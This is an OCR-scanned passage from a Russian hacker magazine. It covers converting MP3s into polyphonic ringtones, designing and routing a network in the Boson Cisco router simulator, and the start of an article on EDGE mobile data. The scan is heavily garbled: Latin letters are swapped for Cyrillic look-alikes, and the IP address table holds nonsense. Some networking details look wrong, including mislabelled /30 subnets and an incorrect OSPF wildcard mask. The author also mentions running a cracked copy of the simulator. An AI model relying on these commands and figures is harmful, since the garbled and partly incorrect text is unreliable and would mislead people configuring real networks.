этап — конвертировать сжатый МРЗ-файл в неупакованный ѴѴАѴ 
со специальными характеристиками. Конечно, некоторые утили- 
ты умеют работать сразу с МРЗ, но большинство по-прежнему не 
признает его и требует в качестве исходного материала ѴѴАѴ'ы. 
По большому счету проблемы в таком преобразовании нет. Если 
у тебя стоит ѴѴіпАМР ( ѵѵѵѵѵѵ.ѵѵіпотр.сот ), то вполне достаточно 



зайти в Ргеіегепсез -> РІид-Іпз -> Оиіриі и активировать плагин 
ІЧиІІзоіі Эізк ѴѴгііег. Затем выбрать в плей-листе и воспроизвести 
нужную композицию — через несколько секунд готовый ѴѴАѴ- 
файл окажется в папке, указанной в настройках плагина. При 
этом важно установить следующие параметры выходного файла: 

Формат: РСМ 

Частота дискретизации: 16 000 Гц 

Глубина: 16 бит 

Каналы: моно 



Впрочем, использовать ѴѴіпАМР совершенно необязательно. Воз- 
можно, тебе удобнее будет воспользоваться специализирован- 
ными утилитами типа МРЗ іо ѴѴАѴ Сопѵегіег ( ѵѵѵѵѵѵ.трЗ-іо-ѵѵаѵ.пеі ) 
или профессиональным ЗоипсІ Рогде (ѵѵѵѵѵѵ.зопісіоипсігу.сот). 
Теперь о том, каким образом осуществляется преобразование в 




[ѴѴіпАМР — отличное средство для преобразования МРЗ-файла в формат ѴѴАѴ] 
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МЮІ. В интернете распространяется огромное количество подхо- 
дящих утилит, но особым авторитетом пользуется программа Т$- 
Аисііо То МЮІ Реаіііте Сопѵегіег ( ѵѵѵѵѵѵ.аисІіоТо.сот ). Прога имеет 
несколько нестандартный интерфейс, поэтому опишу процесс 
конвертирования по шагам: 

Щ В левом верхнем углу находится кнопка «Ореп ѴѴаѵе Рііе». Наж- 
ми на нее и выбери ѴѴАѴ-файл для конвертирования. 

\г\ Далее в правой части окна из выпадающего меню МЮІ Іпзігитепі 
нужно выбрать инструмент, партия которого является в композиции 
основной, например, пианино. От того, какой именно пункт меню ты 
выберешь, будет сильно зависеть звучание получившейся мелодии. 
Какой-либо конкретный совет здесь дать сложно — просто экспе- 
риментируй, и все получится. 

[з] Для того чтобы начать процесс преобразования, нажми на 
«Сопѵегі іо МЮІ Рііе». Как только МЮІ-файл будет создан, в нижней 
части окна активируются новые опции и функции. В первую оче- 
редь это, конечно же, функции воспроизведения полученного фай- 
ла — можно прослушать мелодию не отходя от кассы и сразу 
внести необходимые изменения. Описывать массу других специ- 
фических настроек не имеет смысла, так как они подробнейшим 
образом рассмотрены в документации. Замечу лишь, что все уста- 
новки можно сохранить и не мучиться с ними каждый раз заново. 



Если ты все сделал 
правильно, то ММР го- 
това! Для ее прослу- 
шивания совершенно 
необязательно (хотя и 
желательно) исполь- 
зовать сотовый теле- 
фон — достаточно 
открыть файл с по- 
мощью того же само- 
го РзтРІауег'а. Если 
окажется, что качест- 
во звучания оставляет 
желать лучшего, попробуй выпол- 
нить следующее: 

Ц] Последовательно уменьшай 
громкость мелодии клавишами 




[эта утилита совершенно точно 
пригодится, если нужно вырезать 
отрывок из МРЗ-композиции] 



«плюс» и «минус». Бывает, что из-за 

чересчур высокой громкости динамик телефона начинает трещать. 

\2\ Изменяй скорость проигрывания мелодии в случае, если 
полифоническая мелодия получилась слишком быстрой или 
наоборот, медленной. 

[з] Отключи неудачные звуковые дорожки (голоса). Для этого нажми на 
кнопку Зі в правой нижней части окна и последовательно отключай по 
одной дорожке, на лету прослушивая результат. Если окажется, что од- 
на или несколько дорожек фальшивят, отключай их навсегда, после че- 
го жми на кнопку Ми. Тем самым ты сохранишь результат. 

Конечно, даже все эти ухищрения не гарантируют достижения же- 
лаемого результата. Если добиться качественного звучания так и 
не удалось, рекомендую попробовать другую утилиту — ѴѴЗС-МА2 
С зтаі-уатаііа.сот ) от разработчиков формата ММЕ. Примеча- 
тельно, что эта программа работает с ѴѴАѴ-файлами (и только с 
ними!), а значит, процедуру преобразования ѴѴАѴ в МЮІ можно 
пропустить. Но учти, что параметры ѴѴАѴ-файла должны в точности 
совпадать с теми, что указаны в начале статьи © 



[МЮІ -> ММР] Если ты уже создал МЮІ-файл или скачал его из инета, 
то вполне можешь преобразовать его в популярный формат ММЕ. 
Много для этого не надо — всего лишь известный плеер-конвертер 
РзтРІауегб (Шр://д5тпеТ. ги/рюдгатз/ргоді.ІіТт) . Вот алгоритм: 

|Т| Нажимай ЕНе -> Сгеаіе ЗМАЕ, далее выбирай 5МАЕ 40сИогсІ5 или 
ЗМАЕ ІбсОогсІз соответственно для 40- или 16-голосной полифонии, 
[г] Далее кликай по красной кнопке тулбара Сопѵегі и жди появления 
окна параметров конвертирования. Наиболее важный из них — Еііезііе 
Іітіі (Ьуіе). Значение этого параметра нельзя устанавливать слишком 
высоким, так как в противном случае ММЕ может быть неправильно об- 
работан телефоном. Вот тебе реальный пример: многими моделями 
Затзипд'а ММЕ более 16 Кб попросту не обрабатывается. 

[з] Жми ОК и жди окончания конвертирования. Если возникнет 
ошибка Зресііісаііоп зіге ѵѵаз ехсеебесі, то указанный лимит на 
размер файла слишком мал или исходный МЮІ-файл чересчур 
длинный. В свою очередь, сообщение ТГіе питЬег оі ігаскз і§ оѵег 
говорит о том, что МЮІ-файл содержит больше инструментов, чем 
выбранное количество голосов полифонии. Так или иначе, попытку 
конвертирования придется повторить еще раз, но уже подкоррек- 
тировав значения соответствующих параметров. 




[изящный интерфейс ТЗ-АисІіоТоМЮІ Сопѵегіег. Количество функций 
также впечатляет!] 




[конвертер ѴѴАѴ -> ММР от известной фирмы Уатаііа: просто перетащи ѴѴАѴ- 
файл в область окна] 



[ЭКСПЕРИМЕНТИРУЙ!] 

Создание полифонических мелодий — это целая наука. 
Не исключено, что, обработав любимую композицию, 
ты «слегка» удивишься тому, насколько мелодия отли- 
чается от оригинала, а то и вообще мало на него похо- 
дит. Виной тому — высокие погрешности в преобразо- 
ваниях. Выход тут только один — искать минусовки (как 
это делают профессиональные конторы) и эксперимен- 
тировать с параметрами конвертирования. Да и вооб- 
ще, не каждая композиция подходит для преобразова- 
ния в полифонию — об этом тоже нужно помнить. Для 
создания хорошего рингтона следуй моим советам: 

* Работай только с основной темой композиции (при- 
певом, интересным вступлением и т.д.). Не стоит пре- 
образовывать всю композицию сразу. Во-первых, у не- 
которых телефонов есть ограничение на максималь- 
ную длительность мелодии. А во-вторых, память теле- 
фона все-таки не резиновая. 

* Желательно, чтобы выбранный отрывок можно было 
зациклить. Это особенно важно, если он имеет не- 
большую длину. 

* Заранее продумай, сколько голосов будет использо- 
вать твой рингтон. Пойми, что большое количество го- 
лосов вовсе не гарантирует качественного звучания. 
Напротив, самодельные рингтоны с большим количе- 
ством каналов звучат слишком тихо и неэффектно. 









Исследуйте мир вместе 





Новые возможности для членов Башей семьи 
’ помогите нм расширить сферу интересов 
и развить новые умения и навыки 
ёхсііоп Ыпіѵегваі ЕР 13 на базе процессора 
ІпШ Вѳсйіілті® 4 е технологией НТ работает о 
исключительной производительностью, 
открыва я новые возможности для обучения 
детей и помогая найти важную информацию 
для папы, мамы и всей семьи 
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Построй сеть 
своей мечты! 

ЛЮБОМУ СИСАДМИНУ РАНО ИЛИ ПОЗДНО 
ПРИДЕТСЯ СТОЛКНУТЬСЯ С ВОПРОСОМ ПРО- 
ЕКТИРОВАНИЯ СЕТИ. ЛИБО В СЛУЧАЕ ОРГА- 
НИЗАЦИИ СОБСТВЕННОЙ СЕТКИ, ЛИБО ПО 
ПРИКАЗУ НАЧАЛЬСТВА. НО ВОТ БЕДА: КАК 
ОПТИМАЛЬНО РАССЧИТАТЬ КОЛИЧЕСТВО 
УСТРОЙСТВ, ИХ КОНФИГУРАЦИЮ, РАСПОЛОЖЕ- 
НИЕ И ВЫБРАТЬ НАИЛУЧШИЙ ПРОТОКОЛ МАРШ- 
РУТИЗАЦИИ? В ЭТОМ ТЕБЕ ПОМОЖЕТ ДАННЫЙ 
МАТЕРИАЛ И ПРОГРАММА ВОЗОМ ВОІІТЕВ 

ЗІМІЛАТОВ I Докучаев Дмитрий ака РогЬ (1ЪгЬ@геаІ. хакер. ш) 



Виртуальное 
проектирование 
информационной сети 

[исходные данные] Предположим, что на- 
чальник фирмы, в которой ты работаешь, 
приказал спроектировать большую сеть. В 
качестве маршрутизаторов, использую- 
щихся в этой сети, применяются роутеры от 
компании Сізсо (в наше время можно найти 
хорошую Киску за небольшие деньги :)). 
Также тебе известна подсеть, которую, 
скрипя зубами, выделил вышестоящий про- 
вайдер. Вот, можно сказать, все данные, 
которые понадобятся для проектирования. 
Осталось лишь скачать эмулятор сети 
Возоп, который поможет тебе воплотить 
виртуальную сеть в реальность. 

Возоп Роиіег Зітиіаіог является мощным 
средством сетевого проектирования. Эта 
чудесная софтина состоит из двух частей: 
дизайнера топологии и конфигурационно- 
го раздела. Исходя из того, что у тебя в го- 
лове есть только туманное представление 
о будущей сетевой картине, необходимо 
начинать с моделирования топологии. Од- 
нако я чуток поторопился — прежде всего, на- 
до скачать саму программу (ШрУ/Тіт.изТи.ги/ 
5оЦ-/Ьо50п.іог.ді). Я намерено взял старую 
версию 3.71, так как для нее у меня имеется 
небольшое лекарство (для старших релизов 
кряк найти сложно, а использовать урезан- 
ную версию мне не особо хотелось). 



[конструктор АЕГО] После установки эму- 
лятора можно приступать к уроку рисо- 
вания :). Запускай софтину, жми на кноп- 
ку меню Ыеілл/огк Эезідпег и выбирай 
пункт Эезідп уоиг о\л/п пеі\л/огк (впрочем, 
кроме этого раздела я ничего больше и 
не узрел :)). Сразу после этого ты заме- 
тишь в левой части список доступных уст- 
ройств. Здесь необходимо подумать: до- 







На нашей хакерской 
болванке ты найдешь 
софтину Возоп Воиіег 
Вітиіаіог, множество 
электронных тестов от 
Возоп 1 а, а также 
конфигурацию сетевой 
топологии для Возоп Воиіег 
Вітиіаіог. 



пустим, ты хочешь, чтобы роу- 
теры находились в двух раз- 
ных районах, а также тебе не- 
обходимо связать их с цент- 
ральным машрутизатором 
в серверной твоей фирмы. По- 
мимо этого ты организуешь 
две отдельные подсети с по- 
мощью свитчей. Опять-таки 
повторюсь, что моделирова- 
ние топологии — дело творческое, и здесь я вряд ли тебе чем- 
то помогу — я просто привожу пример возможной сети. 

Будем считать, что связь между маршрутизаторами и конечными 
подсетями происходит с помощью технологии ЕіИегпеі (будь то 
оптика, или ІІТР — неважно), поэтому для своих нужд выбираем 
роутеры только с интерфейсами ЕіИегпеі (в списке они обознача- 
ются так: «Е-количество портов»). Подразумевая, что ты будешь ис- 
пользовать резервные связи по ЗегіаГному порту (а выбирать не 
приходится, так как старая версия симулятора не знает о новых 
технологиях :)) между маршрутизаторами, подсчитаем: потребу- 
ется два роутера с двумя езер- 
нетовскими и одним сериаловс- 
ким портом, а также один цент- 
ральный маршрутизатор с дву- 
мя езернетовскими портами. 

Находим нужные железяки в ка- 
талоге и бросаем кружочки на 
поле. Я выбрал два устройства: 

2514 для первого случая и 808 
для второго. Помимо этого я по- 
ложил на схему два свитча и че- 
тыре РС-станции, которые будут 
обозначать конечные сети. 

Теперь, когда все железки в 
сборе, их надо как-то соеди- 
нить. Коннектить их будем с по- 
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[настраиваем конечный узел] 



Я думаю, что ты прекрасно знаешь, как разбивать сети на мелкие 
подсети, поэтому не буду лишний раз тебя учить :). В итоге первого 
разбивания на 4 подсети у меня получились следующие сегменты: 

195.48.0.0/18 

195.48.64.0/18 

195.48.128.0/18 

195.48.192.0/18 



Теперь следует взять одну из подсетей и раздробить ее на три бо- 
лее мелкие. Пусть жертвой будет сеть 195.48.192.0/18. После раз- 
бивания я получил еще четыре сегмента: 

195.48.192.0/30 

195.48.208.0/30 

195.48.224.0/30 

195.48.240.0/30 

Теперь пора определиться, какие сегменты мы применим к нашей 
топологии. Пусть для конечных сетей будут использованы подсети 
195.48.0.0/18 (ІЮІІТЕИ, РС1, РС2), 195.48.64.0/18 (РОІІТЕР2, РСЗ, 
РС4), 195.48.192.0/30 (РОІЯЕР1, РОІІТЕРЗ), 195.48.208.0/30 (РОІІТЕР2, 
РОІІТЕРЗ) и 195.48.224.0/30 (резервный канал между РОІІТЕР1 и 
РОІІТЕР2). Для дальнейшего удобства все данные были занесены 
в таблицу. Там же я выделил отдельный ІР-адрес для каждого пор- 
та роутера и конечных узлов. 



[тянем киску за хвост] Настало время для практической конфигу- 
рации нашей будущей сети. На данный момент у нас имеются все 




Для того чтобы научиться 
управлять железками от 
Сізсо, совсем необязатель- 
но посещать дорогие курсы 
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Существует целая теория 
маршрутизации, которая 
доступна и на русском 
языке. Советую тебе 



№ 

П/СЕТИ 


АДРЕС 

ПОДСЕТИ 


УСТРОЙСТВА 
В ПОДСЕТИ 


ІР-АДРЕС 

(УСТРОЙСТВО, ПОРТ) 


1 


195.48.0.0/18 


НОІІТЕН1 , 
РС1, РС2 


ЮйОЗ РАТ16 раздел с по 


ІѲйОЗ РАТ16 раздел с по 


КЗйОЗ РАТ16 раздел с по 


2 


195.48.64.0/18 


НОІІТЕН2, 
РСЗ, РС4 


ЮйОЗ РАТ16 раздел с по 


ЮйОЗ РАТ16 раздел с по 


ІѲйОЗ РАТ16 раздел с по 


3 


195.48.192.0/30 


НОІІТЕР1 , 
РОІІТЕРЗ 


ІѲйОЗ РАТ16 раздел с по 


ЮйОЗ РАТ16 раздел с по 


4 


195.48.208.0/30 


РОІІТЕР2, 

РОІІТЕРЗ 


ЮйОЗ РАТ16 раздел с по 


ІѲйОЗ РАТ16 раздел с по 


5 


195.48.224.0/30 


РОІІТЕР1 , 
РОІІТЕР2 


ІѲйОЗ РАТ16 раздел с по 


ЮйОЗ РАТ16 раздел с по 



ССІ\ІА. Компания Возоп вы- 
пустила множество элект- 
ронных тестов по Сізсо, ко- 
торые помогут тебе в нелег- 
ком администрировании. 



ознакомиться с работой 
протоколов на ресурсе 
ііНрѴ/аіііепа.ѵѵзи.ги 
/пеІ/Ьоок. 



мощью вкладки Соппесііопз и какой-то матери :). Сперва займемся соедине- 
нием роутеров. Я расскажу, как слинковать роутер 1 и роутерЗ магистраль- 
ным кабелем, а остальное ты сделаешь по аналогии. Итак, выбираем вклад- 
ку Соппесііопз, кладем прямоугольник ЕіНегпеі посередине роутеров, жмем 
по нему правой кнопкой и выбираем СопИдиге. Далее в списке соотносятся 
порт 0 первого с нулевым портом второго маршрутизатора. Вуаля! Как ты за- 
метил, между шлюзами появилась сплошная линия. Это значит, что все сде- 
лано верно :). По аналогии соедини вторую ветку. Теперь точно также коннек- 
тим соседние маршрутники 1 и 2 резервной линией. Здесь все аналогично 
первому случаю, только выбирай прямоугольник с названием ЗегіаІ. Практи- 
чески все готово, осталось только соединить четыре РС-станции с роутера- 
ми посредством свитчей. Я думаю, ты с этим справишься без моей подсказ- 
ки :). После всех мучительных действий ты получишь следующую картинку, 
изображенную на рисунке. 

[бьем по сетям!] Но как ты сам понимаешь, подобной схемой дело не ограни- 
чивается. Теперь для тебя открывается следующая проблема: нужно разбить 
сеть, выданную провайдером, на мелкие подсети. Причем разбить рацио- 
нально, чтобы тебе гарантированно хватило ІР-адресов для каждого компью- 
тера в конечной сети. Если внимательно посчитать, то получается 5 подсетей, 
для которых необходимо выделить ІР-адреса. 

Предположим, что провайдер продал тебе сеть 195.48.0.0/16. Твоя задача — разд- 
робить ее на более мелкие подсети и, как я уже сказал, сделать это рациональ- 
но. Пусть для конечных подсетей (а их насчитывается целых две) будет использо- 
вана маска 255.255.192.0, а для межмаршрутных соединений вполне хватит маски 
255.255.255.252 (реально потребуется занять всего два ІР-адреса из подсети). 



ІР-адреса и связная топология. Опираясь на это, мы вполне мо- 
жем подвязать айпишники ко всем устройствам. 

Начнем с центрального маршрутизатора. На двух его портах не- 
обходимо прописать адреса 195.48.192.1/30 и 195.48.208.1/30. 
Для начала сохраняем созданную топологию в файл іороіоду.іор 
и закрываем эмулятор. После повторного запуска вы- 
бираем третий режим — І_оасІ зітиіаіог изіпд заѵіпд 
іороіоду. Подгружаем свежесохраненную схему и ви- 
дим, что эмулятор сгенерировал окно для каждого уст- 
ройства. На данный момент нас интересует окошко с 
названием РоиіегЗ. Открой его, и попадешь в консоль 
центрального маршрутизатора. Вот тут-то тебе и при- 
годятся навыки в командах Сізсо. Если ты не посещал 
курсы ССІМА, то тебе придется вникнуть в мои сужде- 
ния, чтобы понять смысл каждой цисковой команды :). 




[хакер 07 [79] 05 > РС_20ИЕ 029 ] 



[ХАКЕР 07 [79] 05 > РС_20МЕ 030] 
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[пингуем и наслаждаемся] 



Сперва необходимо получить дополнительные привилегии. Это 
достигается командой епаЫе или просто еп (все Циски отлично 
понимают сокращенные команды). Набери ее, и приглашение 
Роиіег 1> сменится на Роиіег I#. Все как в Линухе :). По умолча- 
нию эмулятор не запрашивает никаких паролей, однако при же- 
лании это можно исправить. Но для нас защита Сізсо — пока не 
главное. Сейчас необходимо правильно прописать ір-адреса 
на интерфейсы. Следующая команда будет называться сопіід- 
иге іегтіпаі (или сопі і). В режиме конфигурации терминала сле- 
дует выбрать нужный интерфейс и изменить его свойства. Дела- 
ется это запросом іпіегіасе еііпегпеі #, где # — номер порта. В 
нашем случае надо набрать команду іпіегіасе еікі 0. Тут же из- 
менится приглашение — это означает, что ты на верном пути и 
вошел в конфигурацию нулевого интерфейса. Теперь пропишем 
на нем ір-адрес 195.48.192.1 с маской 255.255.255.252. Это дела- 
ется запросом ір асісігезз 195.48.192.1 255.255.255.252. Но и это 
еще не все. Прописать адрес — слишком мало для нормальной 
работы Сізсо. Нужно еще и включить интерфейс, который по 
умолчанию находится в коматозном состоянии. Изменить статус 
интерфейса поможет команда по 5ІпиісІо\л/п. 

Если все выполнено без ошибок, то пиши два раза ехіі и вернешь- 
ся в главное меню привилегированного режима. Здесь следует 
проверить правильность твоих действий. Набери команду $ію\л/ 
гиппіпд-сопіід и проанализируй настройки интерфейсов. Обяза- 
тельно проверь соответствие портов на схеме и в конфиге, а так- 
же правильность адресов и масок. 

По аналогии настраиваются все остальные роутеры. Следует 
оговориться, что для входа в конфигурацию сериальных интер- 
фейсов используется команда іпіегіасе зегіаі #, выполненная в ре- 
жиме конфигурации терминала. 

Когда с роутерами будет покончено, следует заняться конечными 
узлами. Писюки, по мнению эмулятора, управляются \Л/іпсІо\л/5 98, 
но при клике на окно устройства ты увидишь голимый, да еще и уре- 
занный по самые уши МЗЭОЗ :). Но для тебя это не проблема. Наби- 
рай команду \л/іпірсід и аккуратно заполняй все три поля (ір, ітазк и 
даіе\л/ау). Я считаю, что здесь все пройдет без лишних вопросов. 
Теперь расскажу о свитчах. Все свитчи в эмуляторе также являют- 
ся управляемыми, но по дефолту пропускают пакеты куда надо 
без каких-либо ограничений. Поэтому не рекомендую играть с 
настройками коммутатора — работает, и ладно ;). 



[статические таблицы] Для того чтобы пакеты летали во 
все стороны, необходимо прописать все маршруты ко 
всем сетям. То есть довериться статической маршру- 
тизации. Но для начала сохрани исходную настройку 
устройств. Для этого выбери в меню Рііе пункт Заѵе 
І\іеі\л/огк Сопіід. Зачем это нужно, ты узнаешь далее. 
Традиционно, я расскажу на примере, как статически 
оформить сведения обо всех подсетях на маршрути- 
заторе 1, а ты повторишь настройку аналогичным об- 
разом для шлюзов 2 и 3. 

Итак, у нас имеется 5 подсетей. Для второго маршру- 
тизатора три из них являются родными — это сеть 1,3 и 
5 (смотри таблицу с ІР-адресами). Они уже имеются в 
таблице маршрутизации и обзываются как Эігесііу 
Соппесіеб І\Іеі\л/огк5. Об остальных двух подсетях роу- 
тер слыхом не слыхивал. Твоя задача — прописать две 
дополнительных строки, чтобы освежить мозги второму 
шлюзу :). Маршрут к первой сети с адресом 
195.48.64.0/255.255.192.0 лежит через центральный 
шлюз 2 и шлюз 3. Я намерено игнорирую резервный канал, так как 
он более медленный и используется только в экстренных случаях. 
Первый хоп до сети — роутерЗ, поэтому команда добавления но- 
вого маршрута будет выглядеть так: 

ір гоиіе 195.48.64.0 255.255.192.0 195.48.192.1 

Здесь необходимо помнить, что 195.48.192.1 — входной порт сле- 
дующего маршрутизатора из соседней сети. Данное правило 
действует для всех строк таблицы роутинга. 

Четвертая подсеть прописывается аналогичным образом. Марш- 
рут в этот сегмент лежит также через РОІІТЕРЗ, поэтому команда 
практически не отличается от предыдущей: 

ір гоиіе 195.48.192.0 255.255.255.252 195.48.192.1 

Запомни, что маршруты нужно заносить в режиме конфигурации 
терминала. После добавления всех маршрутов ознакомься с пол- 
ным списком правил маршрутизации командой $0о\л/ ір гоиіе. Ес- 
ли все сделано правильно, то на каждом роутере должно отоб- 
разиться пять строк (сведения обо всех подсетях). 

Теперь любой узел должен пинговаться с любого устройства. Если 
где-то что-то не работает — значит, ты ошибся в ІР-адресе или воткнул 
статический маршрут не на тот роутер :). Исправить ошибку тебе по- 
могут команды зкю\л/ ір гоиіе (показать таблицу маршрутизации) и по ір 
гоиіе сеть маска ір-адрес (убрать ненужную запись из таблицы). 

[динамика ритма] Статические маршруты — это, конечно, здоро- 
во. Но, ты, наверное, сам понимаешь, что администратор сети — 
не всегда компьютерный гений. Он может забыть прописать под- 
сеть, указать неправильный адрес сегмента, либо маску подсети. 
За примерами далеко ходить не надо: когда я проектировал топо- 
логию, то сам ошибся на одну цифру. Естественно, что в реальных 
условиях данная ошибка непростительна. А если учитывать, что 
подсетей может быть больше сотни, то прописывать их на каждый 
маршрутник — просто нереально. Но выход как всегда прост — 
необходимо использовать динамическую маршрутизацию. 

Я рассмотрю только два основных протокола маршрутизации в 
информационных сетях — РІР и ОЗРЕ. Если ты знаешь теорию, то 
четко понимаешь отличия между ними. В противном случае обра- 



[включаем пингомѳт] Теперь проверяем работос- 
пособность всех устройств. Ведь не зря же мы про- 
делывали всю работу! Для проверки заюзаем стан- 
дартную команду ріпд ір_абсіге55. Сперва попингу- 
ем из конечных станций. Например, проверяем 
связь между РСЗ и РОІІТЕР2. Для этого набираем ко- 
манду ріпд 195.48.64.1. Если все в порядке — ты по- 
лучишь стандартный ответ, в противном случае при- 
дет таймаут. Теперь попробуем пропинговать 
маршрутизатор РОІЯЕР1 (195.48.192.2) с маршрути- 
затора РОІІТЕРЗ. Если киска вернет пять восклица- 
тельных знаков, значит все олл райт. В случае возв- 
рата пяти точек — пинг не прошел. 

А сейчас попытайся пингануть конечный узел РС1 с 
центрального роутера 3. Получилось? А вот и нет :). 
Неудача объясняется тем, что шлюз не знает об этой 
сети, так как не может найти маршрут к ней. 
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[настройка сети завершена!] 




тись к ознакомительной врезке. Сперва попробуем отладить 
маршрутизацию по простому протоколу РІР-1 (вторую версию 
протокола данный релиз эмулятора пока не поддерживает). 
Помним из теории маршрутизации, что статические правила главнее 
всего. Даже если мы включим динамику, то пакеты все равно пойдут 
по статическим путям. По идее, статические записи можно легко 
удалить командой сіеаг ір гоиіе *, но в эмуляторе эта команда не ра- 
ботает :(. Помнишь, я просил тебя сохранить топологию после при- 
вязки адресов к интерфейсам? Я это сделал специально: теперь те- 
бе следует выбрать из меню Рііе пункт І_оасІ Ыеілл/огк СопИд и подож- 
дать пару минут, пока конфиги применятся к каждому устройству. 
Теперь мы вернулись на один шаг назад — у нас чистая тополо- 
гия без статических записей. Начнем с настройки протокола РІР. 
Войдем в режим конфигурации терминала и выполним команду 
гоиіег гір. После этого ты попадешь в режим конфигурации прото- 
кола. В реальных устройствах Сізсо в этой вкладке можно наст- 
роить множество параметров, а в эмуляторе позволительно лишь 
прописать сеть, о которой будет рассылаться информация. Бла- 
годаря тому, что маска подсети в РІР-1 попросту не применяется, 
тебе нужно прописать все пять подсетей. Это делается коман- 
дой пеі\л/огк, параметром к которой выступает нужная сеть. Фи- 
нальная команда конфигурирования — ехіі. 

Выполняй данную процедуру на всех остальных роутерах и смот- 
ри результат. Во-первых, пинги до всех сетей должны гарантиро- 
ванно проходить, а во-вторых, в таблице маршрутизации появятся 
дополнительные правила обо всех подсетях. То есть все, как и в 
статике, но гораздо быстрее и удобнее :). 

Но опять же, из-за минусов РІР мы не получим оптимальной марш- 
рутизации. Пакеты могут запросто пойти как по главному, так и по 
резервному каналу, что не есть хорошо. С помощью ОЗРР ты смо- 
жешь настроить метрики для каждого пути и тем самым заставить 
систему выбрать оптимальный маршрут. 

Настройка ОЗРР немного отличается от настройки РІР. 

Для начала необходимо отменить маршрутизацию по 
РІР командой по гоиіег гір, а затем сделать запрос гоиРег 
озрР 1 . Здесь 1 — уникальный идентификатор ОЗРР-про- 
цесса. Он нужен для использования нескольких ОЗРР- 
таблиц. После входа в раздел конфигурации протокола 
необходимо прописать все соседние интерфейсы с 
особыми параметрами. Это требуется для того, чтобы 
активировать интерфейс, по которому будут переда- 
ваться ОЗРР-сообщения. Итак, полная команда конфигу- 
рирования будет выглядеть следующим образом: 

пеіѵѵогк 195.48.0.0 0.192.255.255 агеа 0 

Здесь маска подсети должна быть указана в инверти- 
рованном состоянии. Почему? Хрен его знает :). Так 
вот нелогично решили разработчики софта от Сізсо. 

Опция агеа 0 указывает, что ОЗРР будет использовать- 
ся в области 0 (область записывается в заголовок каж- 
дого ОЗРР-сообщения и принимается маршрутизато- 
ром только при соответствии зоны). После прописыва- 



[ВІР И ОЗРР — ЧТО ЛУЧШЕ] 

В качестве динамических протоколов маршрутиза- 
ции наиболее популярны ВІР и ОЗРР. Я постара- 
юсь дать небольшие теоретические основы, чтобы 
ты понял принцип их работы. 

ВІР относится к классу дистанционно-векторных про- 
токолов. После конфигурирования ВІР-системы проис- 
ходит рассылка так называемых векторов расстояний 
по всем интерфейсам обо всех известных сетях. В 
вектор расстояния входит адрес сети и метрика (изна- 
чально — 1). После приема данного вектора, соседний 
маршрутник просмотрит свою таблицу и при отсут- 
ствии данных о сети внесет запись в память. Затем он 
увеличит метрику на единицу и разошлет пакет по 
всем своим каналам. В случае, если запись присут- 
ствует, роутер сравнивает метрики и вносит строку в 
таблицу только в случае более выгодной метрики. 
Несмотря на всю простоту и удобство, протокол ВІР 
непригоден в сетях с числом маршрутизаторов, превы- 
шающим 15. Дело в том, что константа 16 обозначает 
бесконечность и выставляется, если сеть недоступна. 
Можно добавить, что ВІР не способен оптимально при- 
меняться в сетях с разными каналами, так как в лю- 
бом случае пакет пойдет по кратчайшему пути незави- 
симо от пропускной способности линии связи. В этом 
протоколе неприменим метод суммирования сетей, а 
также случаются такие явления, как зацикливание и 
образование петель. Если добавить к этому проблемы 
засорения широковещательным трафиком, то можно 
посчитать ВІР не таким уж и хорошим протоколом. 

Все проблемы решаются в протоколе ОЗРР. Он отно- 
сится к классу состояния связей. ОЗРР не рассылает 
данные обо всех сегментах, он шлет только сведения о 
соседних сетях в коротких НЕ1_1_0-сообщениях. После 
отправки и получения информации, он строит так назы- 
ваемую базу, а затем составляет наиболее оптималь- 
ный маршрут до каждого узла, учитывая стоимость про- 
хождения пакета по каналу и его пропускную способ- 
ность. Если случается, что маршруты до сетей одинако- 
вы, шлюз делит трафик на равные части и шлет по 
всем каналам. Как видишь, оптимизация налицо. 



ния всех соседних сетей на всех роутерах можно проверять ра- 
боту протокола, пинганув какой-нибудь не родной айпишник. Кро- 
ме этого, ты заметишь пополнение строк в таблицах маршрутиза- 
ции. Теперь можно с гордостью сказать, что твоя сеть работает 
оптимально. 

Вот, собственно, и все. Только что мы спроектировали большую ин- 
формационную сеть. После подобного практического урока тебе 
будет гораздо легче превратить эмулятор в реальные Циски, приме- 
нив к ним уже готовые айпишники с гарантией того, что вся система 
будет работать. Ты больше не будешь бояться слов РІР и ОЗРР, так как 
уже столкнулся с этими понятиями и даже настроил протоколы. Ос- 
талось пожелать тебе удачи в раскрутке директора на покупку бе- 
зотказных маршрутизаторов @ 




[отточенная схема сетевой топологии] 
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ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ 




Соты будущего 



НЕ ТАК ДАВНО МЫ РАССКАЗАЛИ ТЕБЕ ОБ ИЗ- 
ВЕСТНОЙ ТЕХНОЛОГИИ ОРВЗ. РАССМОТРЕЛИ 
ЕЕ, ЧТО НАЗЫВАЕТСЯ, СО ВСЕХ СТОРОН, ОБ- 
СУДИЛИ ДОСТОИНСТВА И НЕДОСТАТКИ. УЖЕ 
ТОГДА БЫЛО ЯСНО, ЧТО В БУДУЩЕМ НА СМЕ- 
НУ ОРВЗ ОБЕЩАЕТ ПРИДТИ НОВАЯ, ЗНАЧИ- 
ТЕЛЬНО БОЛЕЕ МОЩНАЯ И ЭФФЕКТИВНАЯ 
ТЕХНОЛОГИЯ — ЕЭОЕ. НО НИКТО НЕ ПРЕД- 



Перспективы сотовой 
связи на пальцах 

[что есть ЕЭ0Е?] Очень часто получается 
так, что самые настоящие гуру, знающие 
характеристики всех без исключения теле- 
фонов, затрудняются и не могут ответить на 
простой вопрос: «Что такое ЕЭ0Е?». Если не 
вдаваться в интимные подробности, то отве- 
тить в двух словах можно так: «ЕЭ0Е — это 
замена 0РР5». В качестве аргумента для 
моих слов достаточно привести тебе неко- 
торые данные, и все сразу станет ясно. 
Известно, что в существующих сетях 03М/0РРЗ 
максимально возможная скорость передачи 
данных составляет всего 1 15 Кбит/с. Да и то — 
это чисто теоретически, так как на практике 
ее значение на порядок ниже. В тоже время 
технология ЕЭ0Е позволяет увеличить это зна- 
чение сразу в три раза, а точнее — до 384 
Кбит/с. По-моему, впечатляет. 

Конечно, абоненты имеют дело со ско- 
ростью вдвое, а то и втрое ниже, то есть ре- 
альное значение скорости составляет 
примерно 80—130 Кбит/с, а в пиковых пе- 
риодах достигает 200 Кбит/с. И это на мо- 
бильном телефоне! От возможностей пос- 
леднего, кстати говоря, напрямую зависит 
и скорость соединения. В отличие от техно- 
логии 0РР5, которую большинство аппара- 
тов поддерживают практически одинако- 
во. Многие считают, что 0РР5 и анонимная 
ЗІМ-карта — это гарант анонимности. Одна- 



яШяр ѵѵѵѵѵѵ.Здпет.ги — новости сотовой связи 3-его поколения. 
